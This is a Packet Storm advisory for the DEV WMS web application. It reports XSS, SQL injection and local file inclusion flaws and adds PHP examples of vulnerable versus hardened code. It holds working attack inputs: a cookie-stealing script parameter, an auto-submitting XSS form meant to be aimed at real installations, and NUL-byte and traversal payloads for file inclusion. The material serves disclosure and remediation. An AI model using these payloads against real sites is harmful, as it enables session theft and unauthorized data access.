devwms-lfisqlxss.txt

2008-07-31T00:00:00
ID PACKETSTORM:68648
Type packetstorm
Reporter IRCRASH
Modified 2008-07-31T00:00:00

Description

----------------------------------------------------------------  
  
Script : DEV WMS  
  
Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / SQL Injection )  
  
Alert : High  
  
----------------------------------------------------------------  
  
Discovered by : Khashayar Fereidani (Dr.Crash)  
  
My Website : HTTP://FEREIDANI.IR  
  
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com  
  
----------------------------------------------------------------  
  
Script Download : http://dev-wms.sourceforge.net/  
  
----------------------------------------------------------------  
  
XSS Vulnerability 1 :  
  
Variable Sent Method : GET  
  
Vulnerable Variable : session  
  
Address : http://Example.com/?session=">><>><script>alert(document.cookie)</script>  
  
Solution : encode the session value with htmlspecialchars() (with ENT_QUOTES) at every point where it is written into the page, and reject values that do not have the shape of a session id before they reach the template.  
  
----------------------------------------------------------------  
  
XSS Vulnerability 2 :  
  
Variable Sent Method : POST  
  
Vulnerable Variable : kluc  
  
Address : http://Example.com/index.php?session=0&action=search  
  
Replace Example.com with the address of a real installation, save the page below as ircrash.html and open it in a browser: the form is submitted automatically and the injected script runs in the context of the target site.  
  
<html>  
<head></head>  
<body onLoad="document.forms['form'].submit()">  
<form action="http://Example.com/index.php?session=0&action=search" method="POST" name="form">  
<input type="hidden" name="prip" value="true"/>  
<input type="hidden" name="action" value="search"/>  
<input type="hidden" name="kluc" value="&#34&#39&#39&#39&#60&#62&#62&#62&#62<script>alert('xss')</script>">  
</form>  
</body>  
</html>  
  
Solution : encode the kluc value with htmlspecialchars() (with ENT_QUOTES) wherever the search term is echoed back into the results page or the form.  
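The pattern behind both XSS findings (session reflected from GET, kluc reflected from POST) and the fix the advisory recommends, shown as an added example. This is illustrative PHP written for this page, not DEV WMS source: only the parameter names come from the advisory; the form markup, the render functions and the assumption that a session id is numeric are illustrative.

```php
<?php
// Added example, not DEV WMS source. Parameter names (session, kluc) are the
// advisory's; the form markup and the assumption that a session id is
// numeric are illustrative.

// Vulnerable shape: request values are written straight into the page, so a
// value containing "> closes the attribute and the remainder is parsed as markup.
function render_search_form_vulnerable(string $session, string $kluc): string
{
    return '<form action="index.php?session=' . $session . '&action=search" method="post">'
         . '<input type="text" name="kluc" value="' . $kluc . '">'
         . '</form>';
}

// Hardened: encode at the point of output. ENT_QUOTES covers both quote
// styles, so the value is inert inside a "..." or a '...' attribute; naming
// the charset keeps the encoder and the page in agreement about what a
// character is.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function render_search_form_hardened(string $session, string $kluc): string
{
    // session should never be free text: reject anything that is not an id
    // before it reaches the template (assumed format: up to 10 digits).
    if (!preg_match('/\A[0-9]{1,10}\z/', $session)) {
        $session = '0';
    }
    return '<form action="index.php?session=' . e($session) . '&amp;action=search" method="post">'
         . '<input type="text" name="kluc" value="' . e($kluc) . '">'
         . '</form>';
}

// Constructed inputs in the shape of the advisory's two payloads.
$sessionPayload = '">><>><script>alert(document.cookie)</script>';
$klucPayload    = "\"'''<>>>><script>alert('xss')</script>";

// The vulnerable markup contains a live <script> element; the hardened
// markup carries the same characters as entities, which the browser renders
// as text inside the attribute.
echo render_search_form_vulnerable($sessionPayload, $klucPayload), PHP_EOL, PHP_EOL;
echo render_search_form_hardened($sessionPayload, $klucPayload), PHP_EOL;
```

Encoding belongs at output, not at input: the same kluc value may legitimately be stored, logged, or placed in a JavaScript string, and each of those contexts needs its own escaping.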
  
----------------------------------------------------------------  
SQL Injection :  
  
Variable Sent Method : GET  
  
Vulnerable Variable : article  
  
Address : http://Example.com/index.php?session=0&action=read&click=open&article=[SQL CODE]  
  
Solution : treat article as an integer (reject or cast any non-numeric value) and pass it to the query as a bound parameter instead of concatenating it into the SQL string. Blacklisting "dangerous" characters is not a reliable fix for this class of bug.  
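The query shape that produces this finding beside the hardened version, as an added example. This is illustrative PHP, not DEV WMS code: the table and column names are assumed, an in-memory SQLite database stands in for the real one so the file runs on its own, and only the parameter name "article" comes from the advisory.

```php
<?php
// Added example, not DEV WMS code. Table and column names are assumed; the
// parameter name "article" is the advisory's. SQLite in memory stands in for
// the application's database so the script is self-contained.

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
$db->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, public INTEGER)');
$db->exec("INSERT INTO articles VALUES (1, 'Welcome', 1), (2, 'Draft: unpublished', 0)");

// Vulnerable shape: the GET value is pasted into the statement text, so the
// input can change the structure of the WHERE clause, not just a value in it.
function load_article_vulnerable(PDO $db, string $article): array
{
    $sql = "SELECT id, title FROM articles WHERE public = 1 AND id = " . $article;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: the value must look like an id, and it is bound as data, so the
// statement's shape is fixed before any user input is involved.
function load_article_hardened(PDO $db, string $article): array
{
    if (!ctype_digit($article) || strlen($article) > 10) {
        return [];   // not an article number: refuse, do not try to "clean" it
    }
    $stmt = $db->prepare('SELECT id, title FROM articles WHERE public = 1 AND id = :id');
    $stmt->bindValue(':id', (int) $article, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed input in the shape of the advisory's ?article=[SQL CODE].
// AND binds tighter than OR, so the vulnerable query becomes
// (public = 1 AND id = 0) OR 1=1 and returns every row, including the
// unpublished draft. The hardened function rejects the same input and
// returns only the requested public row for a genuine id.
$payload = '0 OR 1=1';

var_dump(load_article_vulnerable($db, $payload));
var_dump(load_article_hardened($db, $payload));
var_dump(load_article_hardened($db, '1'));
```

Turning emulated prepares off matters with MySQL as well: with emulation on, PDO interpolates the value client-side and the query text still reaches the server as one string.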
  
----------------------------------------------------------------  
Local file inclusion :  
  
Variable Sent Method : GET  
  
Vulnerable Variable : step  
  
Address : http://Example.com/admin/index.php?start=install&step=file.type%00  
  
Solution : accept only step values from a fixed whitelist and never build an include path from the parameter. Note that the %00 truncation shown above requires a PHP older than 5.3.4 (with magic_quotes_gpc off); on newer builds the NUL byte makes the include fail, but a traversal without it still reaches any file carrying the appended extension, so the whitelist is needed regardless. The installer under admin/ should also be disabled or removed once installation is complete.  
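The include shape behind this finding, what the NUL byte did to it on old PHP, and the whitelist fix, as an added example. This is illustrative PHP, not DEV WMS code: the installer layout (a steps/ directory of per-step files) and the file names are assumed; the parameter name "step" and the %00 trick are from the advisory.

```php
<?php
// Added example, not DEV WMS code. The installer layout (a steps/ directory
// of per-step PHP files) and the file names are assumed; the parameter name
// "step" and the %00 trick are the advisory's.

// Vulnerable shape: the parameter is spliced into an include path, and the
// appended extension is the only thing meant to limit what can be loaded.
function step_path_vulnerable(string $step): string
{
    return __DIR__ . '/steps/' . $step . '.php';
}

// What the C runtime saw on PHP before 5.3.4: everything after the first NUL
// is dropped, which is how "file.type%00" removes the ".php" suffix. Since
// 5.3.4 a NUL in a path makes include() fail instead of truncating.
function path_as_old_php_opened_it(string $path): string
{
    $cut = strstr($path, "\0", true);
    return $cut === false ? $path : $cut;
}

// Hardened: the parameter selects from a fixed map and never becomes part of
// a path, so neither NUL bytes nor ../ sequences have anything to act on.
const INSTALL_STEPS = [
    'welcome'  => 'step_welcome.php',
    'database' => 'step_database.php',
    'admin'    => 'step_admin.php',
    'finish'   => 'step_finish.php',
];

function step_path_hardened(string $step): ?string
{
    if (!array_key_exists($step, INSTALL_STEPS)) {
        return null;   // unknown step: refuse, do not try to sanitise
    }
    return __DIR__ . '/steps/' . INSTALL_STEPS[$step];
}

function run_step(string $step): void
{
    $path = step_path_hardened($step);
    if ($path === null) {
        http_response_code(400);
        exit('unknown install step');
    }
    include $path;
}

// Constructed inputs: the decoded form of step=../../../../etc/passwd%00, and
// a plain traversal with no NUL byte at all.
$withNul = "../../../../etc/passwd\0";
$noNul   = '../../../../var/www/uploads/avatar';

// Old PHP: the suffix is gone and the path ends in /etc/passwd.
echo path_as_old_php_opened_it(step_path_vulnerable($withNul)), PHP_EOL;
// Any PHP: the traversal still lands on avatar.php wherever it lives, so an
// uploaded file with that name runs as code; the NUL was never the real bug.
echo step_path_vulnerable($noNul), PHP_EOL;
// The whitelist rejects the payload and maps a known step to its fixed file.
var_dump(step_path_hardened($withNul));
var_dump(step_path_hardened('database'));
```

The map also makes the set of reachable files reviewable in one place, which a "filter the step variable" fix never gives you.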
  
----------------------------------------------------------------  
  
Tnx : God  
  
HTTP://IRCRASH.COM  
  
----------------------------------------------------------------  